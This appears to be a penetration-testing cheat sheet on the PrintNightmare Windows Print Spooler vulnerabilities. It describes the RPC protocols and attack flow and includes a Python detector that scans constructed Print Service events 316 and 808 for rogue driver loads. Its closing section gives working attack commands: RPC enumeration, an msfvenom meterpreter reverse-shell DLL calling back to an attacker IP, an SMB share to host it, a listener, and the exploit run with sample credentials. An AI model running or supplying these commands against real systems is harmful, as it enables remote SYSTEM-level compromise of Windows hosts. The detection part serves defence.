PrintNightmare
ABOUT
PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527 and CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems.
In short, it is remote code execution as SYSTEM: the Print Spooler is made to load an attacker-supplied printer driver DLL through its RPC interface.
Print Spooler is a Microsoft built-in service that manages printing jobs. It is enabled by default and runs within the SYSTEM context.
MS-RPRN – The main protocol for managing printers and print jobs remotely. It handles tasks like listing printers, sending print jobs, and configuring settings.
MS-PAR – Adds support for asynchronous operations to improve performance. It allows non-blocking calls, like getting print job updates without waiting.
MS-PAN – An extension to MS-RPRN that supports newer features. It enables enhanced printer capabilities used in modern Windows systems.
Prerequisites
Print Spooler enabled on target (e.g., DC or file server)
RPC/SMB access (ports 135, 445)
Attacker can place the driver DLL on a path the target's spooler can read (e.g., an SMB share)
FLOW
Create a malicious DLL
Host SMB share, or put DLL into accessible share
Trigger DLL install via RPC call
Catch the reverse shell (or whatever else your payload does)
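On the defending side, the flow above leaves traces in Microsoft-Windows-PrintService/Operational: Event ID 316 (driver added or updated) whose file list contains a UNC path, and Event ID 808 (spooler failed to load a plug-in module). The script below is an added example and not part of the original page; the event records are constructed and their message wording is an assumption modelled on those events.

```python
import re

# Constructed sample records modelled on Microsoft-Windows-PrintService/Operational
# events. The field layout and message wording are assumptions, not a real log export.
SAMPLE_EVENTS = [
    {"event_id": 316, "message": "Printer driver Microsoft XPS Document Writer v4 for "
     "Windows x64 Version-4 was added or updated. Files:- mxdwdrv.dll, PrintConfig.dll. "
     "No user action is required."},
    {"event_id": 316, "message": "Printer driver 1234 for Windows x64 Version-3 was added "
     "or updated. Files:- UNIDRV.DLL, kernelbase.dll, "
     "\\\\13.13.13.13\\CompData\\defnotsusfile.dll. No user action is required."},
    {"event_id": 808, "message": "The print spooler failed to load a plug-in module "
     "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\old\\1\\defnotsusfile.dll, "
     "error code 0x45A. See the event user data for context information."},
    {"event_id": 307, "message": "Document 5 owned by sreed was printed on HP LaserJet."},
]

SPOOL_DRIVER_DIR = r"c:\windows\system32\spool\drivers"
FILES_RE = re.compile(r"Files:-\s*(.*?)\.\s*No user action", re.S)

def driver_files(message):
    """Return the file list from an Event 316 message (empty if absent)."""
    m = FILES_RE.search(message)
    return [f.strip() for f in m.group(1).split(",")] if m else []

def suspicious_path(path):
    """UNC paths and absolute paths outside the spool driver directory are unexpected."""
    p = path.lower()
    if p.startswith("\\\\"):
        return True
    return ":" in p and not p.startswith(SPOOL_DRIVER_DIR)

def classify(event):
    """Return a reason string when the event matches PrintNightmare-style activity, else None."""
    eid, msg = event["event_id"], event["message"]
    if eid == 316:
        bad = [f for f in driver_files(msg) if suspicious_path(f)]
        if bad:
            return "316 driver add with unexpected file path: " + ", ".join(bad)
    elif eid == 808 and "failed to load a plug-in module" in msg:
        return "808 spooler failed to load plug-in (common after a rogue driver install)"
    return None

def scan(events):
    """Return (event_id, reason) pairs for every flagged event, in log order."""
    return [(e["event_id"], r) for e in events if (r := classify(e))]

if __name__ == "__main__":
    for eid, reason in scan(SAMPLE_EVENTS):
        print(eid, reason)
```

The PrintService/Operational channel is disabled by default, so these events only exist if it was enabled before the driver install.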
LINUX
MS-RPRN Enum
rpcdump.py @13.13.13.13 | egrep 'MS-RPRN|MS-PAR'
DLL Payload Generation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=13.13.13.13 LPORT=8080 -f dll > defnotsusfile.dll
Creating a share
sudo smbserver.py -smb2support CompData /path/to/
(smbserver.py shares a directory, not a single file; put defnotsusfile.dll inside /path/to/)
Turning on multi/handler
msf >> use exploit/multi/handler
...
Running exploit [LINK]
sudo python3 CVE-2021-1675.py militech.local/sreed:password123@13.13.13.13 '\\13.13.13.13\CompData\defnotsusfile.dll'